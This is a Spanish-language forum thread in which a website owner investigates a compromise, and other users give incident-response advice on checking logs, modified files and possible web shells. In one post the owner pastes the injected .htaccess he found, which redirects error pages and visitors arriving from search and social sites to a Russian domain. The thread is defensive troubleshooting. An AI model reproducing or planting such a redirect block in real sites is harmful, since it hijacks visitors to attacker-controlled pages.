Autor
|
Tema: Me están atacando y no se ni como ni por donde (Leído 8,437 veces)
|
Zedmix
Desconectado
Mensajes: 672
B*A
|
Muy buenas, actualmente estoy recibiendo un ataque en mi sitio web, este sitio web proporciona pequeñas páginas webs a pequeñas empresas y autónomos, esta mañana cuando han intentado acceder al sitio web nos hemos encontrado con que no carga la portada, el título de la página no se muestra y en el lugar donde debe de estar todo el contenido nos muestra lo siguiente ubbylys.ru/count28.php al introducir esta url en el navegador accede al sitio web http://178.162.157.189/70470006.html dando un eror 404 Not Found cosa que no comprendo. ¿alguna idea? ya no es una solución sino también el como lo han podido hacer, gracias un saludo.
|
|
|
En línea
|
|
|
|
it3r
Desconectado
Mensajes: 101
|
mm podrías revisar los logs del apache comúnmente en /var/logs/httpd mira si encuentras algo sospechoso como intentos de sql injection o alguna cosa, luego revisa si es que existe algún nuevo usuario creado en el sistema, revisa su historial de comandos (.bash_history), quizás haya sido un ataque automatizado, osea algún bot que se encargue de escanear y automáticamente inyectar malware en las paginas.
de todos modos no olvides que si usas algún CMS o parecido, debes mantenerlo actualizado.
Saludos
|
|
|
En línea
|
|
|
|
|
$Edu$
Desconectado
Mensajes: 1.842
|
Fijate tambien si no te han instalado una shell para poder entrar las veces que quieran luego.
|
|
|
En línea
|
|
|
|
Zedmix
Desconectado
Mensajes: 672
B*A
|
Buenas, estoy con el log y he encontrado lo siguiente lo cual no estoy seguro si es algo que repercuta sobre este problema, debido a que lo que muestra el sitio web es ubbylys.ru/count28.php he buscado en el log una extensión rusa y he encontrado lo siguiente en el log. sticker01.yandex.ru - - [17/May/2012:11:26:49 +0200] "GET /robots.txt HTTP/1.1" 403 22 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" sticker01.yandex.ru - - [17/May/2012:11:26:50 +0200] "GET / HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" sticker01.yandex.ru - - [17/May/2012:11:26:51 +0200] "GET / HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" ticker01.yandex.ru - - [17/May/2012:14:03:34 +0200] "GET /robots.txt HTTP/1.1" 403 22 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" sticker01.yandex.ru - - [17/May/2012:14:03:35 +0200] "GET /una_web HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" sticker01.yandex.ru - - [17/May/2012:14:03:36 +0200] "GET /una_web HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
|
|
|
En línea
|
|
|
|
it3r
Desconectado
Mensajes: 101
|
Buenas, estoy con el log y he encontrado lo siguiente lo cual no estoy seguro si es algo que repercuta sobre este problema, debido a que lo que muestra el sitio web es ubbylys.ru/count28.php he buscado en el log una extensión rusa y he encontrado lo siguiente en el log. sticker01.yandex.ru - - [17/May/2012:11:26:49 +0200] "GET /robots.txt HTTP/1.1" 403 22 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" sticker01.yandex.ru - - [17/May/2012:11:26:50 +0200] "GET / HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" sticker01.yandex.ru - - [17/May/2012:11:26:51 +0200] "GET / HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" ticker01.yandex.ru - - [17/May/2012:14:03:34 +0200] "GET /robots.txt HTTP/1.1" 403 22 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" sticker01.yandex.ru - - [17/May/2012:14:03:35 +0200] "GET /una_web HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" sticker01.yandex.ru - - [17/May/2012:14:03:36 +0200] "GET /una_web HTTP/1.1" 403 42 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" Yandex.ru es el buscador mas conocido de rusia según he escuchado, esos logs solo muestran al BOT de yandex.ru indexando tu web. No se si ya modificaste tu archivo php, si no, podrías ver la ultima fecha de modificación y revisar en el log mas o menos antes de la ultima fecha de modificación.También podrías ver los logs desde la ultima vez que estaba bien tu web. Puedes ayudarte de los comandos tail y grep un ejemplo: Las ultimas 1000 lineas del acces_log-01 y que muestre solo las lineas que contengan AND tail -1000 /var/log/httpd/access_log-01 | grep AND
El and es un patrón común en las sql injections, tambien podrias buscar patrones sobre RFI. Saludos
|
|
|
En línea
|
|
|
|
Zedmix
Desconectado
Mensajes: 672
B*A
|
Muy buenas continuo aquí investigando, como ha dicho el compañero @it3r he comprobado los últimos archivos con modificaciones, y me he encontrado con tres archivos que se han modificado recientemente, que son: index.php, asdf.html y .htaccess ambos están modificados a la misma hora y el mismo día los abriré y os comento en breve.
Gracias
|
|
|
En línea
|
|
|
|
Zedmix
Desconectado
Mensajes: 672
B*A
|
Buenas, después de revisar los archivos: - asdf.html: es un archivo en jQueryMobile con el cual yo hice prueba hace bastante tiempo y no lo eliminé ahora veo que ha sido moificado a la misma hora y día que cuando comenzó esto y no me permite eliminarlo
- index.php: no veo ninguna anomalía, pero también ha sido modificado el archivo a la hora y día del acceso
- .htaccess: aquí viene el asunto, he modificado el nombre de este archivo y parece que se ha solucionado el problema, pero cuando accedo al servidor desde un explorador, es decir abro una web, en la zona inferior izquierda del Chrome me muestra, "esperando a ubbylys.ru" ¿?¿?¿?
También mostraros el contenido del archivo .htaccess #d93065# RewriteEngine On ErrorDocument 400 ubbylys.ru/count28.php ErrorDocument 401 ubbylys.ru/count28.php ErrorDocument 403 ubbylys.ru/count28.php ErrorDocument 404 ubbylys.ru/count28.php ErrorDocument 500 ubbylys.ru/count28.php ErrorDocument 502 ubbylys.ru/count28.php RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ ubbylys.ru/count28.php [R=301,L] #/d93065#
|
|
|
En línea
|
|
|
|
it3r
Desconectado
Mensajes: 101
|
no se si estas en un hosting o un server que tu mismo administras pero como te comentaron antes, debes restaurar con una copia de seguridad que tengas, si no la tienes (muy mal hecho xD) y estas en un hosting pregunta si ellos tienen una copia de seguridad de tu web y si estas en un servidor controlado por ti, entonces lee el link que te pasaron antes.
Saludos
|
|
|
En línea
|
|
|
|
h3ct0r
Desconectado
Mensajes: 108
Hail to the king baby!
|
El .htaccess es solo una cara de la moneda, revisa BIEN tus archivos php, puede que hagas include a algun script que no hallas revisado con detalle y tiene alguna referencia a ubbylys.ru. Lo mas probable es que sea algun pedazo de código ofuscado que muestre un javascript maligno así que dales una buena ojeada. Si no encuentras nada raro en las fuentes, usa tamper data o live http headers para firefox y ve como se hacen los request desde tu pagina, capaz te ayude a ver donde están localizados los script maliciosos. Offtopic : Últimamente están de moda los crackers rusos y chinos defaceando por ahí
|
|
|
En línea
|
[img[/img]
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
ayuda,estan atacando mi red.
« 1 2 »
Redes
|
javmax
|
16
|
9,358
|
24 Mayo 2010, 20:35 pm
por lover2912
|
|
|
¿Están atacando al OnePlus One en los foros de forma organizada?
Noticias
|
wolfbcn
|
1
|
2,270
|
25 Abril 2014, 04:21 am
por #!drvy
|
|
|
¿Están los hackers atacando tu Gmail? Aprende cómo comprobarlo y defenderte
Noticias
|
wolfbcn
|
0
|
1,387
|
31 Agosto 2015, 14:46 pm
por wolfbcn
|
|
|
¿Como consigo muestras de malware que están atacando actualmente?
Seguridad
|
LaThortilla (Effort)
|
2
|
2,598
|
29 Mayo 2017, 00:35 am
por LaThortilla (Effort)
|
|
|
¿Dónde están los mazos en Mana Link 3.0?
Software
|
Tachikomaia
|
2
|
2,878
|
5 Abril 2021, 20:59 pm
por Tachikomaia
|
|